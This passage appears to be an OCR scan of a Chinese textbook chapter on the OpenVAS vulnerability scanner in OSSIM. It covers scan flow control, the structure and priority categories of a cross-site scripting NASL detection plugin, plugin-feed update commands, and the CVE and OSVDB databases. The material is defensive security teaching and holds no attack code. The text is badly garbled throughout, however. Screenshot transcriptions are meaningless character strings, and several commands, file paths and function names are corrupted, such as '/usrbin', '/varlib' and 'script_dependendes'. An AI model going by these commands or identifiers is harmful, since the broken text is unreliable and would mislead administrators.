e 扫描 流程 的 控制 ， 通 过 多 线程 技术 实现 ; 

© NASL 脚本 的 调度 与 执行 ， 由 脚本 引擎 实现 。 
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9.5.1 扫描 流程 控制 

OpenVAS 可 同时 对 多 个 主机 进行 检测 与 评估 ， 默 认 情况 下 是 对 5 个 主机 同时 扫描 ， 对 每 
台 主 机 进行 扫描 时 ， 最 大 打开 20 个 线程 ， 在 使 用 过 程 中 也 可 根据 自己 的 需要 进行 修改 。 配 置 
扫描 目标 信息 时 ， 有 多 种 命名 方式 ， 表 9-2 对 命名 方式 进行 总 结 。 


表 9-2 OpenVas 检测 目标 命名 方式 
命名 方式 范例 


注意 这 里 的 主机 名 必须 在 资产 列表 中 注册 ， 才 可 正常 输入 。 换 而 言 之 从 安全 角度 考虑 ， 
如 果 新 添加 的 服务 器 没有 注册 ， 系 统 拒绝 扫描 漏洞 。 以 下 是 OSSIM 下 进行 OpenVas 漏洞 扫描 
时 ， 定 义 检测 目标 的 两 种 结果 ， 如 图 9-67 所 示 。 


CREATE SCAN JOB 
Job Name: fest 
Select Server: Fist Available Server Drsibued [v] 
Profile: Default - Non destructive Full and Fast scan Iv] 


Schedule Method: amedai T3 


a Il 
M Only scan hosts that are gam 


alivo (Type here to search assets (Hosts/Networks) = ig Assets 
= i$ 10.3244 02 hos) 
E 10.32.14.20 tHost-10-32-14-20) 


(greatly speeds up the 
Scanning process) 


tocal 1 0- 3214.0-24 (10.32 14.0/24) 


alienvault (10.32.14.133) 


回 prescan locally 
(do not pre-scan from / 
Scanning sensor) / 


8 10.32.14.131 Host103214131) 
8 10.32.14.133 alenau 
E 10.32.14 g8 ost1032.14 


Do not resolve names at Piet AS 


g 103214 ll eecios2 
E 10.3214 fF eoscios2 [5 
8 10.3214 f eoscios2 [5 
E 103214 [3] eoscios2 ds 
E 103214 ll oost1032.14 
© d Asset Groups 
* gg Networks 
© i Network Groups 


CONFIGURATION CHECK RESULTS 


TARGET INVENTORY TARGET ALLOWED SENSORS SENSORALLOWED = VULNSCANNER — NMAPSCAN LO 
1032140724 —— LocaL10.32,14.0 24 v 1032.14133 [alienvault] v v Ven 
103214133 alienveuit v 1032.14.133 [alienvautt] v v Jmm A 


SCANNERIP — SCANNER CONNECTION 
103214133 v 


图 9-67 定义 扫描 主机 地 址 的 方法 
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| 如 果 在 这 里 输入 检测 主机 IP 使 用 10.32.11.30~100， 或 10.32.11.30-10.32.11.100 这 2 种 方 
式 定义 目标 机 器 ， 会 提示 错误 信息 。 


对 扫描 目标 解析 完成 后 ， 在 不 大 于 同时 检测 最 大 主机 数 条 件 下 ， 使 用 fork0 函 数 对 每 个 目 
标 主 机 建立 相应 进程 ， 每 个 进程 中 使 用 多 线程 调用 NASL 脚本 进行 扫描 。OpenVAS 的 扫描 流 
程控 制 如 图 9-68 所 示 。 


初始 化 靶 本 加 载 ， 
目标 主机 解析 


进程 1 进程 2 HRS ereere 进程 N 


线 
程 
2 
AE 
检测 信 
息 统 计 


生成 检测 报告 | 


- WDR 


图 9-68 OpenVAS 扫描 流程 控制 
通过 多 进程 与 多 线程 的 使 用 ， 显 著 提高 了 OpenVAS 检测 效率 。 


9.5.2 ”扫描 插件 分 析 

OpenVAS 采用 渗透 测试 原理 ， 利 用 扫描 器 模块 中 的 脚本 引擎 对 目标 进行 安全 检测 。 
Openvas 中 扫描 器 的 性 能 依赖 于 扫描 并 发 进程 数 ， 脚 本 引擎 根据 用 户 提交 的 配置 与 要 求 ， 首 先 
对 脚本 进行 加 载 ， 按 照 调度 顺序 依次 执行 脚本 ， 实 现 扫描 功能 。 


1. 插件 功能 举例 

在 /var/lib/openvas/plugins/ 目 录 下 ,分 析 cross_site_scriping.nasl 脚本 ， 跨 站 脚本 漏洞 是 Web 
应 用 的 常见 漏洞 。 下 面 将 对 cross_site_scriping.nasl 脚本 分 析 ， 总 结 此 类 漏洞 检测 过 程 。 查 看 
这 个 脚本 第 77 43: 

77 行 script category (ACT GATHER INFO) 
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设置 脚本 的 类 别 ， 这 些 类 别 有 : 


€ ACT GATH (信息 采集 类 脚本 ) 

€ ACT ATTACK (尝试 获取 远程 主机 权限 脚本 ) 
€ ACT_DENIAL (拒绝 服务 攻击 脚本 ) 

€ ACT SCANNER ( 端口 扫描 脚本 ) 


Category 代表 了 脚本 执行 的 优先 级 ， 这 种 优先 级 的 设 定 符合 常规 扫描 过 程 ， 优 先 级 如 表 
9-3 所 示 ， 该 表 在 调整 扫描 策略 时 会 体现 出 来 。 在 扫描 初期 需要 收集 目标 主机 的 端口 、 系 统 、 
服务 等 信息 ， 根 据 这 些 已 知 的 信息 进行 后 续 测试 ， 这 种 测试 也 是 按照 由 弱 到 强 的 顺序 执行 ， 为 
什么 呢 ? 如 果 首 先 就 进行 最 强 的 漏洞 扫描 ， 相 当 于 进行 最 危险 的 测试 ， 一旦 目标 主机 存在 相应 
漏洞 ， 系 统 立 即 就 会 月 溃 ， 整 个 测试 就 无 法 全 面 进行 。 


表 9-3 NASL 脚本 优先 级 
Category 类 型 优先 级 
ACT INT 
ACT SCANNER 
ACT SETTINGS 
ACT GATHER INFO 
ACT ATTACK 
ACT MIXED ATTACK 
ACT DESTRUCTIVE ATTACK 
ACT DENIAL 
ACT KILL HOST 
ACT FLOOD 
ACT END 
ACT UNKNOWN 


NASL 脚本 的 结构 与 参数 在 后 面 将 会 进行 详细 介绍 ， 此 处 先 对 脚本 中 category 参数 进行 简 
单 描述 。category 在 脚本 调度 的 过 程 中 非常 重要 ，category 代表 了 脚本 执行 的 优先 级 ， 通 过 对 
各 类 category 值 的 优先 级 进行 定义 ，NASL 脚本 按照 表 9-4 中 给 出 category 优先 级 由 高 到 低 执 
行 ， 相 同 优先 级 按照 脚本 id 顺序 执行 。 

这 种 优先 级 的 设 定 符合 一 般 扫 描 过 程 的 逻辑 ， 我 们 在 扫描 初期 ， 需 要 对 目标 网 络 的 端口 
信息 、 系 统 信息 、 服 务 信息 等 进行 收集 ， 根 据 这 些 已 知 信息 ， 合 理 进 行 后 续 的 测试 ， 而 且 在 测 
试 过 程 中 也 要 按照 由 弱 到 强 的 顺序 执行 ， 如 果 首 先进 行 高 危 测 试 ， 且 目标 系统 存在 相应 漏洞 ， 
则 会 导致 系统 崩溃 ， 测 试 无 法 继续 进行 。 NASL 脚本 在 完成 加 载 调 度 的 过 程 中 ， 需 要 经 过 三 次 
处 理 ， 每 次 处 理 都 定义 了 符合 要 求 的 链表 结构 对 脚本 及 相关 信息 进行 保存 。 


32 行 include ("revisions-lib.inc") 


添加 引用 的 类 库 。 


v [e |2 ja |o |» je |» |- |o 
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63 行 script id (10815) ; 


添加 openvas ID. 

但 有 些 脚本 会 同时 出 现 script cve id (“CVE-2010-2963”“CVE-2010-3067”)， 这 代表 添 
加 CVE ID。.CVECCommon Vulnerabilities and Exposure ) 这 类 例子 大 家 可 以 参看 deb. 2126_1.nasl 
脚本 ， 如 果 该 漏洞 有 CVE 编号 ， 可 以 在 这 个 字段 给 出 。 同 样 在 freebsd php5-gd.nasl 脚本 里 还 
出 现 了 script_bugtraq_id (33002)， 我 们 可 以 把 CVE 看 作 是 一 个 词典 ， 它 提供 了 许多 的 交叉 引 
用 ， 现 在 大 量 公司 都 宣布 他 们 的 安全 产品 或 数据 库 都 和 CVE 相 兼容 ， 也 就 是 能 够 利用 CVE 
中 漏洞 名 称 同 其 他 CVE 兼容 的 产品 进行 交叉 引用 。 通 过 CVE 中 为 每 个 漏洞 分 配 一 个 唯一 的 名 
称 , 在 其 他 使 用 了 这 个 名 称 的 工具 、 网 站 、 数 据 库 以 及 服务 中 检索 到 相关 信息 ， 同 时 自身 关于 
该 漏洞 的 信息 也 能 够 被 检索 到 。 所 以 在 网 络 安全 评估 时 , 利用 CVE 可 以 找 出 修补 漏洞 的 措施 ， 
CVE 可 以 提供 很 好 的 指导 。 若 要 具体 查询 这 些 ID 信息 ， 可 使 用 grep 命令 。 

#grep -ir "script bugtraq id" /var/lib/openvas/plugins/ 

78 行 script family ("Web Servers") ; 

设置 脚本 所 属 的 族 (family )。 

NASL 对 此 没有 明确 规定 插件 作者 可 以 自己 定义 脚本 所 属 的 族 Openvas 使 用 的 族 包 括 
Debian Local Security Checks 
Fedora Local Security Checks 


Mandrake Local Security Checks 
HP-UX Local Security Checks 
Ubuntu Local Security Checks 
CentOS Local Security Checks 
Windows : Microsoft Bulletins 
FreeBSD Local Security Checks 
Red Hat Local Security Checks 
Solaris Local Security Checks 
CentOS Local Security Checks 
Web application abuses 
FreeBSD Local Security Checks 
Buffer overflow 

Firewalls 

Web Servers 

RPC 

General 

CISCO 

Databases 
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Useless services 

Default Accounts 

Nmap NSE net 

Gain a shell remotely 
Malware 

Port scanners 
IT-Grundschutz 

SMTP problems 

Gentoo Local Security Checks 
SuSE Local Security Checks 
FTP 

Denial of Service 


Windows 


Service detection 
实际 上 这 些 族 就 是 主要 的 攻击 种 类 。 
下 面 继续 看 79 行内 容 : 


79 行 script copyright("Copyright (C) 2001 SecuriTeam, modified by Chris Sullo 
and Andrew Hintz"); 


设置 脚本 的 版 权 信息 

80 行 script_dependendes ("find service.nasl", "httpver.nasl"); 

第 80 行 脚 本 说 明 脚本 依赖 关系 ， 如 果 要 让 cross_site_scriping.nasl 正常 运行 ， 必 须 依赖 
find_service.nasl"、"httpvernasl" 这 两 个 脚本 。 


81 行 script_require_ports ("Services/www", 80); 


第 81 行 脚本 表明 执行 此 脚本 所 需 的 目标 服务 器 的 端口 信息 。 


95 行 port = get http port (default:80) ;获取 服务 器 端口 
123 行 if(get_port_state (port) ) 判断 端口 是 否 打开 
134 行 req = http_get (item:url，port:port) ;发 送 带 有 攻击 性 的 请 求 


Er NASL 脚本 主要 是 对 攻击 的 描述 ， 只 是 说 明 攻 击 的 步骤 ， 不 是 通常 意义 上 的 攻击 。 | 


135 行 r= http keepalive send recv(port:port, data:req, bodyonly: TRUE); f 
收 响应 


165 行 set Kb item(name:string("www/", port, "/generic xss"), value:TRUE); 


查看 知识 库 中 是 否 已 存在 此 漏洞 信息 ， 知 识 库 中 保存 了 各 类 扫描 所 需 相关 信息 ， 例 如 : 
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主机 存活 信息 。 

主机 提供 服务 的 信息 。 
端口 扫描 信息 。 
e 测试 登录 信息 。 


在 脚本 测试 过 程 中 ， 如 果 收 集 到 有 用 的 信息 ， 将 通过 set_Kb_item() 函 数 ， 在 知识 库 中 增 
加 相应 条 目 ; 当 需 要 对 知识 库 中 的 相关 信息 进行 调用 时 ， 则 利用 get_Kb_item() 函 数 进行 读 取 。 
2. 测试 NASL 脚本 


将 自己 写 的 插件 复制 到 openvas 插件 库 目录 /var/lib/openvas/plugins。 
加 载 插件 : 


# openvassd 


3. 重建 插件 库 


# openvasmd --rebuild 


注意 ; 参数 “rebuild” 代 表 从 一 个 正在 运行 的 扫描 器 Copenvassd) 中 重建 数据 库 信息 。 


9.5.3 ”脚本 加 载 过 程 

开发 者 需要 理解 的 一 个 重点 问题 是 ， 当 启动 OpenVAS 时 ， 由 openvassd 进程 加 载 所 有 的 
脚本 〈/varvlib/openvas/plugins/ 下 的 *.nasl 脚本 )， 存 储 为 特定 结构 ; 根据 客户 端 传递 的 配置 信 
息 ， 选 取 需 要 的 脚本 ; 最 后 根据 选取 脚本 的 category 将 脚本 分 组 ， 组 织 脚本 的 执行 顺序 。 

OpenVAS 关于 脚本 管理 设计 得 非常 合理 ， 初 始 的 加 载 脚本 是 保存 的 argiist 链表 内 容 ， 供 
后 面 进一步 选取 脚本 及 组 织 脚本 执行 顺序 时 调用 ， 可 有 效 减少 内 存 的 使 用 ， 提 高 工作 效率 。 在 
脚本 引擎 的 工作 中 ,将 脚本 执行 收集 到 的 信息 保存 在 知识 库 中 ,可 有 效 避 免 重复 扫 描 , 减少 不 
必要 的 资源 浪费 ， 提 高 工作 效率 。 知 识 库 中 保存 的 信息 包含 各 类 扫描 信息 ， 例 如 : 

€ 主机 存活 信息 ( Host/dead ) 。 

© 主机 提供 的 服务 信息 (ftp/no_mkdir ) 。 

€ ”端口 扫描 信息 ( Services/ftp) 。 

e ”测试 登录 信息 (SMB/ogin; SMB/password ) . 

e ”用户 检测 时 进行 的 系统 设置 信息 。 


在 脚本 执行 过 程 中 ， 如 果 收 集 到 有 用 的 信息 ， 将 通过 set_kb_item() 函 数 ， 在 知识 库 中 增加 
相应 的 条 目 ; 如 果 需 要 对 知识 库 中 的 相关 信息 进行 调用 ， 那 么 可 以 使 用 get_kb_item() 函 数 进行 
读 取 操 作 。 

脚本 在 执行 时 如 果 有 依赖 的 系统 环境 、 端 口 状态 等 信息 , 会 在 知识 库 中 查询 ， 并 根据 查询 
结果 做 出 合理 的 操作 。 例 如 : 某 脚 本 的 执行 需要 目标 主机 的 S0 端口 打开 ， 通 过 知识 库 查 询 ， 
发 现 目标 的 80 端口 是 关闭 的 ， 那 么 此 脚本 的 执行 将 放弃 ， 且 该 脚本 对 应 的 线程 关闭 ; 如 果 发 
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现 目 标的 80 端口 处 于 打开 状态 ， 那 么 该 脚本 将 顺利 执行 ， 对 目标 进行 检测 。 通 过 对 知识 库 中 
信息 的 查询 判断 ， 可 有 效 提高 脚本 执行 的 效率 ， 一 些 无 意义 的 扫描 将 被 过 滤 。 


9.5.4. NASL 脚本 介绍 

通过 对 OpenVAS 的 分 析 ， 了 解 到 其 安全 检测 与 评估 的 实现 是 以 NASL 脚本 的 调用 与 解析 
为 基础 的 。NASL 脚本 语言 起 初 是 针对 网 络 安全 扫描 工具 Nessus 开发 的 ， 该 脚本 语言 具有 方 
便 快 捷 ， 灵 活性 强 ， 安 全 性 高 的 特点 ， 便 于 用 户 根据 新 出 现 的 漏洞 特性 ， 写 出 有 针对 性 的 检测 
脚本 。 

NASL (Nessus Attack Scripting Language) 脚本 具有 其 特定 的 格式 要 求 ， 其 脚本 内 容 可 分 
为 两 个 部 分 ， 第 一 个 部 分 是 脚本 的 注册 信息 ， 包 含 脚本 名 称 、CVE-ID、 漏 洞 描述 信息 、 脚 本 
类 型 、 依 赖 的 脚本 或 端口 等 信息 。 第 二 部 分 是 针对 相应 漏洞 的 检测 代码 ， 此 部 分 是 脚本 内 容 的 
核心 ， 包 含 添 加 引用 的 库 、 脚 本 初始 化 、 脚 本 执行 及 检测 返回 信息 等 操作 。 

NASL 脚本 书写 格式 大 致 如 下 所 示 。 

if (description) 

{ 

/* 注 册 信息 : 包含 脚本 名 称 、CVE-ID、 漏 洞 描述 信息 、 脚 本 类 型 ， 依 赖 的 脚本 或 端口 等 */ 

Script-name 

CVE-ID; 

exit(0) 


) 

/* 脚 本 代码 */ 

NASL 脚本 语言 功能 强大 ， 语 法 类 似 于 C 语言 ， 但 是 比 C 要 简单 ， 在 使 用 NASL 脚本 语 
言 时 ， 不 必 考 虑 对 象 的 类 型 、 内 存 的 分 配 与 释放 、 变 量 声明 等 问题 ， 只 要 认真 设计 漏洞 的 检测 
方法 即 可 。 由 于 漏洞 扫描 需 在 网 络 环境 中 进行 , 所 以 NASL 语言 提供 了 丰富 的 网 络 相关 函数 ， 
包括 套 接 字 相 关 函 数 〈 用 户 可 根据 检测 需要 创建 套 接 字 ， 与 目标 主机 进行 通信 )、 原 始 报 文 处 
理 函 数 (用 户 可 根据 扫描 需求 构建 检测 报 文 ， 并 对 返回 信息 进行 分 析 ， 提 取 重 要 内 容 )。NASL 
语言 还 提供 了 一 些 工具 参数 来 简化 检测 脚本 的 书写 , 例如 对 目标 主机 系统 、 端 口 等 信息 的 提取 
函数 。 

NASL 语言 还 提供 了 丰富 的 字符 串 处 理 函 数 。NASL 语言 允许 使 用 =、< 和 > 等 操作 符 以 及 
正则 表达 式 对 字符 串 进 行 模式 匹配 ,并 且 提 供 多 种 实现 模式 匹配 功能 的 函数 。NASL 语言 包含 
字符 串 长 度 计算 ， 内 容 复制 ， 数 据 类 型 转换 、 大 小 写 转换 等 功能 函数 ， 便 于 脚本 编写 。 


OpenVAS 脚本 分 析 


OpenVAS 系统 利用 NASL 脚本 对 目标 主机 进行 安全 检测 与 评估 ， 每 个 脚本 都 有 其 特定 的 
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功能 ， 脚 本 的 代码 内 容 确定 了 其 功能 的 实现 过 程 ， 按 照 不 同 的 业务 需要 选取 脚本 ， 即 可 实现 符 
合 特殊 要 求 的 安全 扫描 。 


9.6.1 OpenVAS 脚本 类 别 

截至 2015 年 9 月 ，OpenVAS 系统 所 包含 的 脚本 已 经 超过 4 万 多 个 ， 所 有 漏洞 库 脚本 名 称 
记录 在 alienvault. vuln_nessus_plugins_feed 表 中 。 根据 测试 的 漏洞 类 型 、 漏 洞 存 在 位 置 等 信息 ， 
将 脚本 分 类 ， 现 有 脚本 族 共 有 50 种 。 详 细 插 件 信 息 读者 可 以 到 网 址 
http://www.freebsdports.info/ports/security/openvas-plugins.html 查看 。 根 据 脚 本 族 的 分 类 可 知 ， 
OpenVAS 可 以 对 网 络 平台 、 应 用 平台 以 及 Web 应 用 进行 检测 o 

应 用 平台 包括 Web 应 用 所 使 用 的 操作 系统 、 服 务 器 、 数 据 库 等 。Web 应 用 只 包含 为 前 面 
所 涉及 的 网 络 平台 与 应 用 平台 提供 服务 的 Web 应 用 ， 并 不 包含 第 三 方 开发 的 Web 应 用 。 详 细 
的 OpenVAS 功能 范围 如 表 9-4 所 示 ， 其 中 红色 部 分 为 OpenVAS 不 能 进行 检测 的 第 三 方 Web 
应 用 。 


表 9-4 OpenVAS 功能 范围 


Web 应 用 
Et: 数据 库 包 括 IBM DB2 , MySQL, Oracle 等 
中 间 件 


操作 系统 各 种 Unix/Linux/Windows 、Vmware ESX 系统 


浏览 器 


防火 墙 Cisco, CheckPoint, Clamav 等 


网 络 设备 
通信 协议 


表 9-4 对 OpenVAS 进行 安全 检测 的 对 象 进行 分 类 并 由 此 分 析 OpenVAS 的 功能 OpenVAS 
安全 评估 系统 可 对 目标 主机 的 网 络 平台 、 应 用 平台 及 Web 应 用 进行 安全 扫描 ， 但 扫描 前 ， 需 
对 扫描 的 主机 相关 信息 进行 收集 ,信息 收集 的 工作 则 由 Port Scanners 脚本 族 中 一 些 脚本 完成 。 

Port Scanners 脚本 族 共 含有 15 个 脚本 ， 包 含 多 种 不 同类 型 的 扫描 方式 ，OpenVAS 默认 扫 
描 配置 中 ， 选 取 其 中 2 个 脚本 ping_host.nasl 和 nmap.nasl 实现 端口 扫描 工作 (脚本 位 于 
/var/lib/openvas/plugins 中 )。 其 中 ping host.nasl 脚本 用 来 判断 目标 主机 是 否 存活 ，nmap.nasl 
脚本 则 调用 nmap 来 对 目标 主机 进行 详细 的 扫描 ， 收 集 相关 信息 。 


9.6.2 ”同步 OpenVAS 插件 


如 果 启 用 OSSIM 的 漏洞 扫描 功能 ， 还 需要 手工 升级 OpenVas 插件 库 ， 同 步 方式 分 为 在 线 
和 离线 两 种 ， 如 图 9-69 所 示 为 采用 离线 升级 方式 。 
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图 9-69 ”同步 插件 


jr M 
da 更 新 插件 之 


需 重启 openvas-scanner 服务 ， 由 于 插件 数量 众多 ， 


1. 在 线 方式 同步 
在 OSSIM 控制 台 下 ， 输 入 以 下 命令 ， 效 果 如 图 9-70 所 示 。 
#openvas-nvt-sync 
脚本 通过 使 用 rsync 及 md5sum 命令 在 rsync://rsync.openvas.org 升级 更 新 程序 和 证 书 。 
这 一 步 完成 之 后 ， 将 下 载 NVT Feed 到 /varlib/openvas/plugins/ 中 。NVT (Network Vulnerability 
Test) 代表 网 络 漏洞 测试 脚本 。 


check=5/69163) 


to-check-3. 


report. format 
1/69163) 


-0/69163) 


3lienvault 


alien 


图 9-70 在 线 同 步 


更 新 时 长 由 更 新 库 的 总 量 和 带宽 决定 ， 所 有 升级 漏洞 检测 脚本 文件 存放 在 
/var/cache/openvas/ 中 。 切 勿 强行 中 断 升 级 过 程 。 


€  *nasldesc, 10524 个 。 
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€ *nasl.nvti, 28832 个 。 


2. 更 新 插件 
下 载 完 所 有 升级 包 后 ， 建 议 停止 所 有 openvas 进程 。 


在 Web UI 下 不 能 有 任何 漏洞 扫描 任务 ， 为 了 确保 成 功 ， 建 议 读者 输入 如 下 命令 查验 : 


下 一 步 ， 进 行 插件 升级 操作 。 


此 行 命令 相当 于 “msrbin/openvas-nvt-sync ”--wget” 执 行 的 效果 ， 正 常 执 行 完 该 命令 之 
后 ,提示 “Framewor profile has been found”、“Sensor profile has been found”、“BEGIN - 
PERFORM UPDATE”。 接 下 来 在 开始 更 新 数据 库 之 前 ， 需 要 重建 OpenVAS NVT 缓存 ， 该 
(Rebuilding NVT cache〉 过 程 后 台 工 作 时 间 较 长 〈 切 勿 强行 中 断 )， 后 台 由 openvassd 进程 负 
责 执 行 ， 大 家 一 定 要 耐心 等 待 进程 执行 完成 ， 切 勿 强行 中 断 。 
最 后 启动 Openvas 服务 。 


以 下 问题 需要 注意 ， 如 果 执 行 升级 命令 后 ， 出 现 “No Sensors Found at …”， 表示 Sensor 
没有 和 Server 建立 连接 ， 这 时 需要 查找 双方 的 配置 问题 。 下 面 我 们 查看 实际 操作 的 效果 ， 如 
图 9-71 所 示 。 
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图 9-71 更 新 插件 


前 最 新 版 的 OSSIM 


al X 


当 单 击 UPDATE SCANNER DB 按钮 后 ， 


插件 扩展 名 为 “naslasc”， 
j 中 提供 了 图 形 化 升级 命令 ， 如 图 9-72 所 示 。 


统 中 指定 下 载 位 置 在 /var/lib/openvas/plugings/ 目 录 中 ， 在 目 | 


ECC x, 
o 
slum] 
EXLLLZILLLTZZZLLIZTLZZZJ 
EN 


图 9-72 升级 设置 


系统 在 后 台 执 行 “/usrbin/rsync -ltvrP --delete 
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--exclude private/ rsync://feed.openvas.org:/nvt-feed /varlib/openvas/plugins” 指 令 并 开始 下 载 、 更 
新 漏洞 数据 库 ， 升 级 完 后 可 查看 “THREAT DATABASE” 信 息 ， 其 存储 在 数据 库 alienvault 的 
K vuln_nessus_plugins 中 ， 截 至 2015 年 4 月 ， 其 总 数 为 38296 。 

3. USM 5.0 系统 中 的 升级 


OSSIM USMS.0 中 升级 过 程 得 到 了 简化 ， 只 要 在 更 新 后 ， 单 击 SETTINGS 设置 按钮 ， 打 
开设 置 窗口 并 单 击 修复 扫描 器 数据 库 按钮 即 可 ， 如 图 9-73 所 示 。 升 级 过 程 中 勿 关闭 此 窗口 。 


E] A "* A X 


VULNERABILITIES o 


OVERY SETTING: o 


REDENTINS 


REPAIR SCANNER D8 


图 9-73 USMS.0 下 升级 方法 


4. 离线 方式 同步 


#openvas-nvt-sync --wget 


执行 该 命令 ， 系 统 会 将 openvas-feed- 日 期 .tar.bz2 包 临 时 下 载 到 /tmp 目录 下 自行 解压 后 ， 
自动 删除 该 压缩 包 ， 当 所 有 新 插件 完成 下 载 后 ， 可 以 利用 以 下 命令 更 新 插件 ， 如 图 9-74 所 示 。 


#wget http://www.openvas.org/openvas-nvt-feed-current.tar.bz2 


图 9-74 下载 离线 升级 包 


#tar -jxf openvas-nvt-feed-current.tar.bz2 -C /var/lib/openvas/plugins/nvt/ 


然后 ， 解 压 至 /var/lib/openvas/plugins/nvt/ 目 录 〈 注 意 : 如 果 没 有 nt 目录 ， 则 需要 手工 创 
建 )， 下 面 命令 开始 更 新 插件 : 
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#perl /usr/share/ossim/scripts/vulnmeter/updateplugins.pl migrate 
d/usr/share/ossim/scripts/vulnmeter/updateplugins.pl update wget 
要 使 其 生效 ， 最 后 就 要 重启 openvas 服务 ， 输 入 以 下 3 条 命令 : 


#/etc/init.d/openvas-manager restart 
#/etc/init.d/openvas-administrator restart 
#/etc/init.d/openvas-scanner restart 


5. Openvas 的 同步 问题 


在 OpenVAS 扫描 时 , 涉及 两 种 同步 分 别 是 rsync 和 wget, 使 用 wget 进行 两 个 服务 器 间 单 
向 文件 同步 ,之 前 曾经 使 用 过 FTP Sync 进行 网 站 同步 ， 结 果 发 现 wget 已 有 类 似 功 能 ， 而 且 更 
加 简单 ， 例 如 : 


#wget -m --no-remove-listing -nH -P /home/xxx/bak/ 
ftp://username:passwordQ8www.xxx.com/* 


KIRN 最 后 tp 路径 后 面 有 个 星 号 “*”， 否 则 wget 只 会 下 载 生成 一 个 目录 列表 文件 idex.html， 
[而 不 会 同步 文件 。 


数 含义 : 
-m: 打开 单 向 镜像 。 
--no-remove-listing: 不 生成 目录 列表 文件 index.html. 
-nH: 不 创建 以 主机 名 命名 的 目录 。 
-P: 下 载 保 存 路 径 。 


e ooo \ 


漏洞 扫描 实践 


9.7.1 漏洞 库 

目前 许多 欧美 的 国际 安全 组 织 都 按照 自己 分 类 准则 建立 了 各 自 的 数据 库 ， 其 中 主流 是 
CVE 和 XForce， 它 的 好 处 是 当 网 络 出 现 安全 事故 ， 入 侵 检 测 系统 ADS) 产生 警报 时 , 像 CVE 
这 类 标准 的 系统 脆弱 性 数据 库 的 建设 工作 就 显得 极为 重要 。 目 前 在 中 国 国 家 计算 机 网 络 应 急 处 
理 协调 中 心 CCNCERT/CC) 领导 下 ,国内 迅速 组 建 了 自己 的 CVE 组 织 一 一 CNCVE, CNCVE 
的 组 建 目的 就 是 建设 一 个 具有 中 国 特色 的 ， 能 为 国内 广大 用 户 服务 的 CVE 组 织 。 但 是 并 不 是 
说 拥有 了 CVE 就 包括 了 所 有 漏洞 问题 ， 除 了 这 些 开 放 的 脆弱 性 数据 库 外 ， 还 应 该 存在 大 量 的 
没有 对 公众 开放 的 脆弱 性 数据 库 。 
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(1) CVE 
CVE (Common Vulnerabilities and Exposures) 由 美国 国安 局 赞助 。CVE 所 指定 的 标准 已 
成 为 国际 标准 ， 以 方便 独立 的 脆弱 性 数据 库 和 不 同安 全 工具 彼此 之 间 能 够 更 好 地 共享 数据 。 
CVE 的 标准 命名 方式 是 由 “CVE”、 时 间 和 编号 三 部 分 组 成 。 例 如 , 命名 为 “CVE-2004-1161” 
的 条 目 表 示 2004 年 第 1161 号 脆弱 性 ， 如 图 9-75 所 示 。 


VULNERABILITIES o 
OVERVIEW  SCANJO3S THREAT DATABASE 
+ 
SEARCH RESULTS FOR THIS CRITERIA 
STMT OATE mw rawon cm ny MISK FACTOR 
^l ^ ^" C204 ^ We 
o DEANED ON THREAT sammy B SUMMARY E 
UAM 四 MAEN 112354 Vihare Local Security Checks Ces for maled patches Quadr 
Ed 
Seu 
ose NAN N d te NX OS verson 
四 ASNS CSCO -Check tre NA OS ves PR 
"^mm menase CISCO- Check the N OS version 
rz os 
vm 20140521 172354 7 Webapnkcaton abuses - Check me version 
四 vena 
D 20140521172354 Web application abuses - Determine tis poii to read a bocal fle oraaa 
um pol F E 
NEDA Ma 
ERIS 
vna 20140521 172354 Web applcation abuses - Detenrine hs posite to je sq code 
m pok F er cvs 
w Em AUAOMZ T7234 Webapolcacen abuses -Determine (Rs possieto exta command 
veame 


9-75” 列 出 漏洞 库 信息 


OpenVAS 中 含有 扫描 器 ， 在 漏洞 扫描 时 ， 首 先 由 扫描 器 对 目标 主机 进行 扫描 ， 获 得 主机 
系统 信息 后 ， 和 系统 的 漏洞 库 进 行 匹 配 ， 查 找 出 可 能 存在 的 漏洞 , 扫描 器 所 能 获得 的 信息 主要 
包括 操作 系统 名 称 、 版 本 及 系统 提供 的 服务 。 

为 了 统一 命名 ， 漏 洞 库 中 必须 为 每 条 漏洞 信息 提供 统一 编号 ， 该 图 中 显示 的 
CVE-2014-0160， 就 是 CVE 的 编号 。 我 们 知道 OpenSSL 是 Apache 和 Nginx 网 络 服务 器 的 默 
认 安 全 协议 ， 此 外 大 量 的 操作 系统 、 电 子 邮 件 和 即时 通信 系统 也 采用 OpenSSL 加 密 用 户 数据 
通信 。 在 2014 年 4 月 初 ， 研 究 者 发 现 OpenSSL v1.0.1 到 1.0.1f 的 密码 算法 库 中 发 现 了 一 个 非 
常 严重 BUG (CVE-2014-0160), 该 BUG 允许 攻击 者 读 取 存 在 BUG 的 系统 的 64KB 处 理 内 存 ， 
暴露 加 密 流量 的 密 钥 、 用 户 的 名 字 和 密码 ， 以 及 访问 的 内 容 。 

CVE 的 内 容 是 CVE 编辑 委员 会 的 合作 努力 的 成 果 。 这 个 委员 会 的 成 员 来 自 于 许多 安全 
相关 的 组 织 , 如 软件 开发 商 、 大 学 研究 机 构 、 政府 组 织 和 一 些 优秀 的 安全 专家 等 , 而 且 CVE 可 
以 免费 阅读 和 下 载 。 

(2) OSVDB 

OSVDB (Open Source Vulnerability Database) 是 由 一 个 社团 组 织 创立 并 维护 的 独立 开源 
的 数据 库 。 它 最 早 是 在 2002 年 的 Black Hat 和 Defcon 安全 会 议 上 提出 的 一 项 服务 , 它 提供 了 
一 个 独立 于 开发 商 的 脆弱 性 数据 库 实现 方案 。 和 CVE 一 样 ，OSVDB 数据 库 也 是 开源 并 且 免 
费 ， 它 由 安全 爱好 者 来 维护 ， 向 个 人 和 商业 团体 免费 开放 。 两 者 的 差异 在 于 CVE 提供 标准 名 
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称 ， 可 以 通俗 理解 为 数据 字典 ， 而 OSVDB 为 每 一 条 脆弱 性 提供 了 详尽 的 信息 ，OSVDB 需要 
参考 CVE 的 名 称 。 在 OSVDB 漏洞 模型 中 有 以 下 概念 比较 重要 ， 读 者 需要 了 解 : 


€ 漏洞 ID: OSVDB 分 配 了 唯一 的 漏洞 ID 编号 。 

€ 漏洞 标题 : 它 是 对 问题 性 质 和 受 影响 产品 的 一 般 性 概括 。 

@ 公布 日 期 : 漏洞 首次 发 布 的 日 期 ，OSVDB 还 细 分 为 发 现 日 期 (漏洞 被 公共 邮件 列表 
公布 的 日 期 ) 、 利 用 日 期 (相关 的 漏洞 利用 手段 首次 被 发 现 的 日 期 ) ， 以 及 解决 日 
期 (厂家 第 一 次 公开 发 布 漏洞 补丁 的 日 期 ) 。 

